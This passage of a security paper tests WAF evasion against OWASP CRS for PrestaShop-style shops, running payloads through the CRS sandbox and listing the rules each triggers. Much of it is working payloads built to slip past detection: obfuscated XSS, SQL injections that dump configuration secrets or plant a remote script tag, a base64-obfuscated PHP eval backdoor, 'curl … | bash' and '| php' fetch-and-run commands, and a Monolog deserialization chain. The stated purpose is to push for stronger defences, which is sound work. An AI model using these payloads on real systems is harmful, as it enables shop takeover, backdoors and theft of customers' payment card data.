5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%5B%5D%2B%5B%5D%29%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%5B%28%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%5B%5D%5D%5D%29%5B%2B%21%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%28%21%21%5B%5D%2B%5B%5D%29%5B%2B%21%2B%5B%5D%5D%5D%28%29%5B%2B%21%2B%5B%5D%2B%5B%21%2B%5B%5D%2B%21%2B%5B%5D%5D%5D%29%28%29%29%22%20%22"
941100 PL1 XSS Attack Detected via libinjection
941160 PL? NoScript XSS InjectionChecker: HTML Injection
941360 PL1 JSFuck / Hieroglyphy obfuscation detected
941120 PL? XSS Filter - Category 2: Event Handler Vector
942430 PL? Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 23)
The XSS landscape is one of the most complex and dense there is. It evolves constantly, alongside changes in the JavaScript language (ECMAScript) and its major frameworks and libraries (jQuery, Bootstrap, React, etc.). And it is not limited to category-1 and category-2 XSS.
It is obviously out of the question to list all variants (see ShadowByte1's Large_XSS_Payloads on GitHub): there are thousands of them that can achieve the same goals - namely, automatically installing a module, gaining full control over PrestaShop via a stored XSS, and then deploying a fraudulent payment module in order to steal all customers' payment card data.
The conclusion of these few demonstrations within the scope of XSS (CWE-79) is : if your WAF provider
- operates at PL1 (Paranoia Level 1) and does not block above a score of 10 points
- operates at PL2 (Paranoia Level 2) and does not block above a score of 20 points
You have no preventive protection against XSS injections.
2.2/ SQL injections
There are three categories of injection under CWE-89 (SQL Injection) :
- Exploration or confirmation injections - including the famous
select sleep(10)
- Tampering injections, which aim to modify your data.
- Exfiltration injections, which aim to extract your data - PDO is vulnerable to them
Using modern libraries has significantly reduced exposure to the first two categories of injection. However, a very widespread misconception is that these tools protect against
all SQL injection attacks.
In practice, almost all systems remain vulnerable to the third category - including those built on PDO - which shows that this perception of complete protection is mistaken.
2.2.1/ SQL injections: exploration or confirmation
We assume everyone is familiar with this famous, completely harmless payload, used to verify that there is - or isn't - a minimum level of security is in place :
?cnmq=1;select(sleep(74/3))-- -
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d 'cnmq=1%3Bselect%28sleep%2874%2F3%29%29--%20-'
942100 PL1 SQL Injection Attack Detected via libinjection
942160 PL1 Detects blind sqli tests using sleep() or benchmark()
942350 PL1 Detects MySQL UDF injection and other data/structure manipulation attempts
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)
Please note the payload's score: 15, which corresponds to three critical rules being triggered. In other words: if your WAF, configured at PL1 (paranoia level 1), doesn't block requests with scores of 15 or higher, this payload will get through without any difficulty.
2.2.2/ SQL injections : tampering
TW has published many variants to demonstrate how ineffective reactive cybersecurity mechanisms (antivirus / antimalware / FIM) can be. For example, here's one that automatically copies and pastes all secrets (including your banking tokens, which can be used to take control of your banking transactions) into a public CMS page so they can be harvested.
SET @a = X'5345542040747066203D202873656C656374206C656674287461626C655F6E616D65202C204C4F434154452827636F6E66696775726174696F6E272C207461626C655F6E616D65292D31292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D202873656C65637420646174616261736528292920616E64207461626C655F6E616D65206C696B65202725636F6E66696775726174696F6E27204F52444552204259204C454E475448287461626C655F6E616D652920415343204C494D49542031293B';PREPARE stmt FROM @a;EXECUTE stmt;SET @b = 0x534554204063203D202F2A52414E444F4D2A2F434F4E434154282755504441544520272C407470662C27636D735F6C616E672053455420636F6E74656E743D434F4E43415428636F6E74656E742C2853454C4543542047524F55505F434F4E434154282253233432222C227C222C6E616D652C227C222C76616C75652C227C22292046524F4D20272C407470662C27636F6E66696775726174696F6E29292057484552452069645F636D733D312729;PREPARE stmt2 FROM @b;EXECUTE stmt2;PREPARE stmt3 FROM @c;EXECUTE stmt3;
Let's test it against OWASP CRS :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=mod%281%2C1%29%3BSET%20%40a%20%3D%20X%275345542040747066203D202873656C656374206C656674287461626C655F6E616D65202C204C4F434154452827636F6E66696775726174696F6E272C207461626C655F6E616D65292D31292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D202873656C65637420646174616261736528292920616E64207461626C655F6E616D65206C696B65202725636F6E66696775726174696F6E27204F52444552204259204C454E475448287461626C655F6E616D652920415343204C494D49542031293B%27%3BPREPARE%20stmt%20FROM%20%40a%3BEXECUTE%20stmt%3BSET%20%40b%20%3D%200x534554204063203D202F2A52414E444F4D2A2F434F4E434154282755504441544520272C407470662C27636D735F6C616E672053455420636F6E74656E743D434F4E43415428636F6E74656E742C2853454C4543542047524F55505F434F4E434154282253233432222C227C222C6E616D652C227C222C76616C75652C227C22292046524F4D20272C407470662C27636F6E66696775726174696F6E29292057484552452069645F636D733D312729%3BPREPARE%20stmt2%20FROM%20%40b%3BEXECUTE%20stmt2%3BPREPARE%20stmt3%20FROM%20%40c%3BEXECUTE%20stmt3%3B--%20-"
This produces no result, which means that
when the WAF is configured at PL1 (paranoia level 1), the payload is completely invisible and will therefore get through without any difficulty.
Let's now test it with a WAF configured at paranoia level 2 (PL2) :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=mod%281%2C1%29%3BSET%20%40a%20%3D%20X%275345542040747066203D202873656C656374206C656674287461626C655F6E616D65202C204C4F434154452827636F6E66696775726174696F6E272C207461626C655F6E616D65292D31292066726F6D20696E666F726D6174696F6E5F736368656D612E7461626C6573207768657265207461626C655F736368656D61203D202873656C65637420646174616261736528292920616E64207461626C655F6E616D65206C696B65202725636F6E66696775726174696F6E27204F52444552204259204C454E475448287461626C655F6E616D652920415343204C494D49542031293B%27%3BPREPARE%20stmt%20FROM%20%40a%3BEXECUTE%20stmt%3BSET%20%40b%20%3D%200x534554204063203D202F2A52414E444F4D2A2F434F4E434154282755504441544520272C407470662C27636D735F6C616E672053455420636F6E74656E743D434F4E43415428636F6E74656E742C2853454C4543542047524F55505F434F4E434154282253233432222C227C222C6E616D652C227C222C76616C75652C227C22292046524F4D20272C407470662C27636F6E66696775726174696F6E29292057484552452069645F636D733D312729%3BPREPARE%20stmt2%20FROM%20%40b%3BEXECUTE%20stmt2%3BPREPARE%20stmt3%20FROM%20%40c%3BEXECUTE%20stmt3%3B--%20-"
932236 PL2 Remote Command Execution: Unix Command Injection (command without evasion)
942150 PL2 SQL Injection Attack: SQL function name detected
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942210 PL2 Detects chained SQL injection attempts 1/2
942380 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
942450 PL2 SQL Hex Encoding Identified
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 48)
This time,
provided your WAF is configured at paranoia level 2 (PL2), we observe a much higher score: 48, corresponding to the triggering of more than nine critical rules.
Just like with XSS injections, there are thousands of variants. Criminal networks know perfectly well that the more “complete” a payload is, the higher the likelihood it will trigger a response from the cyber-defense system.
In the specific case of SQL injection, they therefore often resort to two-phased or fragmented attacks, designed to reduce the detectable fingerprint of each individual request.
Let's take as an example a variant of the SoftbyLinux data-harvesting payload - and its forks, including SoftwarebyMS - which are currently wreaking havoc across the PrestaShop ecosystem:
?cnmq=mod(74,1);/*cnmq*/UPDATE ps_configuration SET value=CONCAT(0x3c,'sc','ript s',"rc='//1j.vc/","'>",0x3c,'/','scr','ipt>') WHERE name="PS_SHOP_NAME";-- -
Please note that this is a multi-vector, two-phased payload: we embed a stored XSS payload within an SQL injection payload :
- The SQL injection is used to inject a stored XSS payload, enabling full takeover of the shop and the deployment of a fraudulent payment module designed to exfiltrate all payment card data
- The XSS payload is obfuscated using the CONCAT keyword and hexadecimal-style transformations
- The anomaly score is reduced by hiding the sequence between the semicolon and the UPDATE keyword using C-style comments
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d 'cnmq=mod%2874%2C1%29%3B%2F%2Acnmq%2A%2FUPDATE%20ps_configuration%20SET%20value%3DCONCAT%280x3c%2C%27sc%27%2C%27ript%20s%27%2C%22rc%3D%27%2F%2F1j.vc%2F%22%2C%22%27%3E%22%2C0x3c%2C%27%2F%27%2C%27scr%27%2C%27ipt%3E%27%29%20WHERE%20name%3D%22PS_SHOP_NAME%22%3B--%20-'
942151 PL1 SQL Injection Attack: SQL function name detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)
Please note the payload's score: 5, which corresponds to a single critical rule being triggered. In other words: if your WAF, configured at PL1 (paranoia level 1), doesn't block requests with scores of 5 or higher, this payload will get through without any difficulty.
Now let's look at paranoia level 2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=mod%2874%2C1%29%3B%2F%2Acnmq%2A%2FUPDATE%20ps_configuration%20SET%20value%3DCONCAT%280x3c%2C%27sc%27%2C%27ript%20s%27%2C%22rc%3D%27%2F%2F1j.vc%2F%22%2C%22%27%3E%22%2C0x3c%2C%27%2F%27%2C%27scr%27%2C%27ipt%3E%27%29%20WHERE%20name%3D%22PS_SHOP_NAME%22%3B--%20-'
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
941330 PL2 IE XSS Filters - Attack Detected
941340 PL2 IE XSS Filters - Attack Detected
942151 PL1 SQL Injection Attack: SQL function name detected
942131 PL2 SQL Injection Attack: SQL Boolean-based attack detected
942150 PL2 SQL Injection Attack: SQL function name detected
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942410 PL2 SQL Injection Attack
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 73)
This time,
provided your WAF is configured at paranoia level 2, we observe a much higher score: 73, corresponding to the triggering of more than fourteen critical rules.
Criminal networks know exactly how to reverse-engineer the security rules triggered by these payloads. They also know that some rules are never enabled due to linguistic incompatibilities - French being a particularly difficult language to protect, notably because apostrophes are so commonly used.
Here is an example of a payload for which the anomaly score is deliberately minimized :
?cnmq=mod/*cnmq*/(1,1);/*cnmq*/UPDATE/*cnmq*/ps_configuration SET value=b'001111000111001101100011011100100110100101110000011101000010000001110011001100010111001001100011001111010010011100101111001011110011000101101010001011100111011001100011001011110010011100111110001111000010111101110011011000110111001001101001011100000111010000111110' WHERE name/*cnmq*/LIKE "PS_SHOP_NAME";-- -
Please note :
- the main payload is obfuscated in binary
- Several C-style comments are added to deceive the regular expressions of the security rules.
Let's now look at the result on the OWASP CRS side, with a WAF configured at paranoia level 2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=mod%2F%2Acnmq%2A%2F%281%2C1%29%3B%2F%2Acnmq%2A%2FUPDATE%2F%2Acnmq%2A%2F%20ps_configuration%20SET%20value%3Db%27001111000111001101100011011100100110100101110000011101000010000001110011001100010111001001100011001111010010011100101111001011110011000101101010001011100111011001100011001011110010011100111110001111000010111101110011011000110111001001101001011100000111010000111110%27%20WHERE%20name%2F%2Acnmq%2A%2FLIKE%20%22PS_SHOP_NAME%22%3B--%20-'
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
942180 PL2 Detects basic SQL authentication bypass attempts 1/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 28)
Provided your WAF is configured at paranoia level 2, we observe a score that is twice as low: 28. However, there's a little secret-one that is rarely acknowledged.
The rule 932200 is difficult to keep enabled, because it triggers on parameters that contain links - or harmless fragments of links - and criminal networks know this perfectly well. As a result, the score actually observed on the vast majority of WAFs will be 28 minus the 10 points associated with rule 932200, i.e. an effective score of 18, not 28.
In other words, this payload will get through any WAF configured at PL2 (paranoia level 2) that does not block requests with scores of 18 or higher.
2.2.3/ SQL injections: union-based exfiltration
Mistakenly, many developers believe they are protected against SQL exfiltration. In reality, almost all database engines remain vulnerable - for a simple reason: by design, it's nearly impossible to fully neutralize this kind of attack. Legitimate uses are numerous, fundamental, and inseparable from the SQL language itself.
We won't dwell on the exploitation process for this type of injection; it is often two-phased, since it requires determining beforehand the custom table prefix of the targeted database.
An often-overlooked technical point - especially among developers who aren't database administrators - is that the
information_schema database contains a large amount of exploitable information.
Even though it is generally difficult - sometimes even impossible - to fully exploit its contents through tools such as phpMyAdmin or Adminer, which restrict this type of SQL query, that information remains fully accessible through your favorite PHP libraries, especially PDO.
If you want to test these injections yourself, do it using a custom PHP script; they won't work with most web-based database administration interfaces, including phpMyAdmin.
To help you clearly understand why we recommend changing the table prefix, we're going to look at two exfiltration queries - one of which is unavoidable when the prefix isn't the platform's default (
ps_ for PrestaShop,
wp_ for Wordpress, etc).
Here is a first injection that makes it possible to exfiltrate the database prefix; the
employee table is targeted because it is always present in PrestaShop :
?cnmq=1 UNION SELECT TABLE_NAME FROM information_schema.TABLES WHERE TABLE_NAME LIKE "%employee"-- -
Let's look at the result on the CRS side :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d 'cnmq=mod%281%2C1%29%20UNION%20SELECT%20TABLE_NAME%20FROM%20information_schema.TABLES%20WHERE%20TABLE_NAME%20LIKE%20%22%25employee%22--%20-'
942140 PL1 SQL Injection Attack: Common DB Names Detected
942190 PL1 Detects MSSQL code execution and information gathering attempts
942270 PL1 Looking for basic sql injection. Common attack string for mysql, oracle and others
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)
Please note the payload score: 15, which corresponds to the triggering of three critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 15, this payload will get through without difficulty.
Now let's look at PL2 (Paranoia Level 2) :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=mod%281%2C1%29%20UNION%20SELECT%20TABLE_NAME%20FROM%20information_schema.TABLES%20WHERE%20TABLE_NAME%20LIKE%20%22%25employee%22--%20-'
932240 PL2 Remote Command Execution: Unix Command Injection evasion attempt detected
942140 PL1 SQL Injection Attack: Common DB Names Detected
942190 PL1 Detects MSSQL code execution and information gathering attempts
942270 PL1 Looking for basic sql injection. Common attack string for mysql, oracle and others
942150 PL2 SQL Injection Attack: SQL function name detected
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942300 PL2 Detects MySQL comments, conditions and ch(a)r injections
942330 PL2 Detects classic SQL injection probings 1/3
942410 PL2 SQL Injection Attack
942480 PL2 SQL Injection Attack
942440 PL2 SQL Comment Sequence Detected
942520 PL2 Detects basic SQL authentication bypass attempts 4.0/4
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 65)
This time, we can see that four times as many rules were triggered: the payload score rises to 65, i.e., thirteen critical rules. In other words: if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 65, this payload will get through without difficulty.
Fortunately, many rules exist in PL2 for UNION clauses, which makes these attacks “noisy” (i.e., they generate a high score), especially when the
information_schema table is explicitly referenced. We have no offensive use cases below 55 points, even when using hexadecimal and/or C-style comments, since no transformation can be applied to elements such as the database name or table name in this context - unless proven otherwise.
Howhever, if the table prefix is known - and therefore there is no need to first exfiltrate information from the
information_schema database - the scoring picture changes :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d 'cnmq=mod%2F%2Acnmq%2A%2F%281%2C1%29%20UNION%2F%2Avxgbodebqnjotvycdypbeppxjymmnigqvpqgwicmadnnehqcwpjobvioqtjngcdgopbgngjwhnhceagdhcijhbpwgjbdqiwjwtyty%2A%2FSELECT%20CONCAT%2F%2Acnmq%2A%2F%28name%2C0x2d%2Cvalue%29%20FROM%2F%2Acnmq%2A%2Fps_configuration--%20-'
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
942190 PL1 Detects MSSQL code execution and information gathering attempts
942270 PL1 Looking for basic sql injection. Common attack string for mysql, oracle and others
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL? Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 33)
Same point as before: since rule 932200 was triggered twice, we need to subtract it from the score, just like 942430, which is only very rarely activated given its complexity. The final observed score will therefore be 20 points.
We know that many of you refuse to tune rule 942440. We'd like to remind you that, in the current CRS, it is a critical rule against bypass techniques such as C-style comment evasion. We therefore refuse to subtract it from the score, even though we arguably should, given the current state of the WAF configurations we've observed.
We hope that, after reviewing these payloads and their scores, you'll understand that when your DevSecOps team advises you to change your table prefix, it's by no means overzealous - it has concrete, real-world impacts on the project's security.
The conclusion from these few demonstrations within the scope of SQL injection (CWE-89) is : if your WAF provider
- operates at PL1 (paranoia level 1)
- operates at PL2 (paranoia level 2) and does not block anything above a 15-point score
You have no preventive protection against SQL injection.
2.3/ PHP injections
We assume everyone is familiar with this harmless payload, used to verify that there is - or isn't - at least a minimal level of protection against PHP injection (CWE-94) in place :
?cnmq=<?php sleep(74/5);
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%3C%3Fphp%20sleep%2874%2F5%29%3B"
933100 PL1 PHP Injection Attack: PHP Open Tag Found
942160 PL1 Detects blind sqli tests using sleep() or benchmark()
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)
Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.
This variant is less well known: it uses what are called “short echo tags”, which - unlike PHP short tags - can no longer be disabled as of PHP 5.3.
?cnmq=<?=74;echo md5(74);
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%3C%3F%3D74%3Becho%20md5%2874%29%3B"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
933100 PL1 PHP Injection Attack: PHP Open Tag Found
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
942151 PL1 SQL Injection Attack: SQL function name detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 20)
Please note the payload score: 20, which corresponds to the triggering of four critical rules. In other words : if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 20, this payload will get through without difficulty.
The point is the same as for SQL injection (CWE-89) and XSS injection (CWE-79) : thousands of variations exist. Nevertheless, the common denominator often associated with this class of vulnerability is the ability to add backdoors to the targeted PrestaShop site.
Here is an offensive payload that makes it possible to achieve this :
?cnmq=<?=1;eval/*cnmq*/('?><?php '.eval/*cnmq*/('return base64'.'_decode(eval/*cnmq*/(base64'.'_'.'dec'.'ode'.'("cmV0dXJuIEBvcGVuc3NsX2RlY3J5cHQoQGd6dW5jb21wcmVzcyhAYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsnX3BrX3JlZmNubXEnXSkpLCAnYWVzLTI1Ni1jYmMnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10sIE9QRU5TU0xfUkFXX0RBVEEsIHN1YnN0cihoYXNoKCdzaGEyNTYnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10pLCAwLCAxNikp")));'));
Please note :
- the main payload is obfuscated in Base64
- The base64_decode keywords are split and then concatenated to reduce the anomaly score.
- Using C-style comments to fool regular expressions.
- It exploits historical weaknesses in WAF handling of Matomo cookies (_pk_ref), while relying on an RSA-encrypted exchange to neutralize after-the-fact protection mechanisms.
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%3C%3F%3D74%3Beval%2F%2Acnmq%2A%2F%28%27%3F%3E%3C%3Fphp%20%27.eval%2F%2Acnmq%2A%2F%28%27return%20base64%27.%27_decode%28eval%2F%2Acnmq%2A%2F%28base64%27.%27_%27.%27dec%27.%27ode%27.%27%28%22cmV0dXJuIEBvcGVuc3NsX2RlY3J5cHQoQGd6dW5jb21wcmVzcyhAYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsnX3BrX3JlZmNubXEnXSkpLCAnYWVzLTI1Ni1jYmMnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10sIE9QRU5TU0xfUkFXX0RBVEEsIHN1YnN0cihoYXNoKCdzaGEyNTYnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10pLCAwLCAxNikp%22%29%29%29%3B%27%29%29%3B"
933100 PL1 PHP Injection Attack: PHP Open Tag Found
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)
Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.
Now let's look at the result on the OWASP CRS side, with a WAF configured at Paranoia Level 2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "oiyc=%3C%3F%3D86%3Beval%2F%2Aoiyc%2A%2F%28%27%3F%3E%3C%3Fphp%20%27.eval%2F%2Aoiyc%2A%2F%28%27return%20base64%27.%27_decode%28eval%2F%2Aoiyc%2A%2F%28base64%27.%27_%27.%27dec%27.%27ode%27.%27%28%22cmV0dXJuIEBvcGVuc3NsX2RlY3J5cHQoQGd6dW5jb21wcmVzcyhAYmFzZTY0X2RlY29kZSgkX0NPT0tJRVsnX3BrX3JlZm9peWMnXSkpLCAnYWVzLTI1Ni1jYmMnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10sIE9QRU5TU0xfUkFXX0RBVEEsIHN1YnN0cihoYXNoKCdzaGEyNTYnLCAkX1NFUlZFUlsnSFRUUF9BVVRIT1JJWkFUSU9OJ10pLCAwLCAxNikp%22%29%29%29%3B%27%29%29%3B"
932200 PL2 RCE Bypass Technique
932200 PL2 RCE Bypass Technique
932240 PL2 Remote Command Execution: Unix Command Injection evasion attempt detected
933100 PL1 PHP Injection Attack: PHP Open Tag Found
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942440 PL2 SQL Comment Sequence Detected
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 43)
Provided that your WAF is configured at Paranoia Level 2, we observe a score four times higher: 43. Nevertheless, the point is the same as with SQL injection : rule 932200 will only rarely be triggered.
Therefore, rule 932200 must be removed from this score. As a result, the score actually observed on the vast majority of WAFs will be 43 minus the 10 points associated with rule 932200, i.e. an effective score of 33, not 43.
In other words, this payload will get through any WAF configured at PL2 (paranoia level 2) that does not block scores greater than or equal to 30.
The conclusion from these few demonstrations within the scope of PHP injection (CWE-94) is : if your WAF provider
- operates at PL1 (paranoia level 1) and does not block anything above a 10-point score
- operates at PL2 (paranoia level 2) and does not block anything above a 30-point score
You have no preventive protection against PHP injection.
2.4/ Remote code execution : RCE
The Magento and NodeJS/React incidents in the second half of 2025 sadly reminded us that this group of vulnerability classes is just as thorny as XSS injections, and that chained attacks - combining multiple vulnerability classes - are now the norm.
To make the paper easier to digest, PHP injections have been treated separately (see section 2.3). Here, we will cover the other common forms of RCE, which span several distinct vulnerability classes.
The three “usual” targets or attack chains - excluding PHP injection, which has already been detailed - that can lead to RCE in the PHP ecosystem (PrestaShop / Magento / WooCommerce) are as follows :
- <?php exec($_GET['test']); ou équivalent : passthru / system etc - CWE-78
- <?php unserialize($_GET['test']); - CWE-502
- <?php is_file($_GET['test']); just like any function that accesses the filesystem with an unprefixed variable - CWE-502, PHAR variant for PHP 7 and earlier
The goal is the same as the one described for PHP injections : to take control of the server, which implies deploying backdoors.
2.4.1/ OS command injection - CWE-78
You've almost certainly already come across this probe payload, used to list users on a GNU/Linux system :
?cnmq=& cat /etc/passwd
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20cat%20%2Fetc%2Fpasswd"
930120 PL1 OS File Access Attempt
932160 PL1 Remote Command Execution: Unix Shell Code Found
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)
Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words: if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.
In an offensive variant, the goal is often to load code remotely. Typical payloads therefore consist in fetching a file hosted on a remote server, then executing it using software available on the target server.
In this example, curl is used to download a file, which is then executed via bash. If your system is vulnerable to RCE and this payload gets through, the attacker immediately gains full control over your e-commerce site.
To minimize the anomaly score, we use a direct call to an IP address here, which helps avoid triggering defense mechanisms related to RFI (Remote File Inclusion).
?cnmq=& curl 8.8.8.8/payload.sh | bash
Let's test our payload at Paranoia Level 1 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20curl%208.8.8.8%2Fpayload.sh%20%7C%20bash"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
932370 PL1 Remote Command Execution: Windows Command Injection
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)
Please note the payload score: 10, which corresponds to the triggering of two critical rules. In other words : if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 10, this payload will get through without difficulty.
Now let's test it at Paranoia Level 2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20curl%208.8.8.8%2Fpayload.sh%20%7C%20bash"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
932370 PL1 Remote Command Execution: Windows Command Injection
932236 PL2 Remote Command Execution: Unix Command Injection (command without evasion)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 15)
Please note the payload score: 15, which corresponds to the triggering of three critical rules. In other words : if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 15, this payload will get through without difficulty.
bash isn't always available in environments with strict security constraints. On the other hand, the PHP binary is almost always present in our PHP e-commerce contexts. Let's look at this payload:
?cnmq=& curl 8.8.8.8/payload.php | php
Let's test it at Paranoia Level 1 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:1" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20curl%208.8.8.8%2Fpayload.php%20%7C%20php"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 5)
Please note the payload score: 5, which corresponds to the triggering of three critical rules. In other words : if your WAF, configured at PL1 (paranoia level 1), does not block scores greater than or equal to 5, this payload will get through without difficulty.
Let's test it at Paranoia Level 2 :
curl -H "x-format-output: txt-matched-rules" -H "x-crs-paranoia-level:2" "http://sandbox.coreruleset.org/" -d "cnmq=%26%20curl%208.8.8.8%2Fpayload.php%20%7C%20php"
932235 PL1 Remote Command Execution: Unix Command Injection (command without evasion)
932236 PL2 Remote Command Execution: Unix Command Injection (command without evasion)
949110 PL? Inbound Anomaly Score Exceeded (Total Score: 10)
Please note the payload score: 10, which corresponds to the triggering of a single critical rule. In other words: if your WAF, configured at PL2 (paranoia level 2), does not block scores greater than or equal to 10, this payload will get through without difficulty.
2.4.2/ Dangerous deserializations - Deserialization of Untrusted Data - CWE-502
Now let's look at dangerous deserialization, exploiting PHP's unserialize function.
For this example, we'll rely on a fragment of the payload used by Session Reaper, which wreaked havoc on the Magento ecosystem. This exploitation chain also exists in PrestaShop, since Monolog has been an essential dependency since PrestaShop 1.7, namely:
?cnmq=Monolog\Handler\BufferHandler":7:{S:7:"handler";r:2;S:10:"bufferSize";i:-1;S:6:"buffer";a:1:{i:0;a:2:{i:0;S:71:"curl 8.8.8.8/payload.php | php";S:5:"level";N;}}S:5:"level";N;S:11:"initialized";b:1;S:11:"bufferLimit";i:-1;S:10:"processors";a:2:{i:0;S:7:"current";i:1;S:4:"exec";}}}
Let's test it at Paranoia Level 1 :
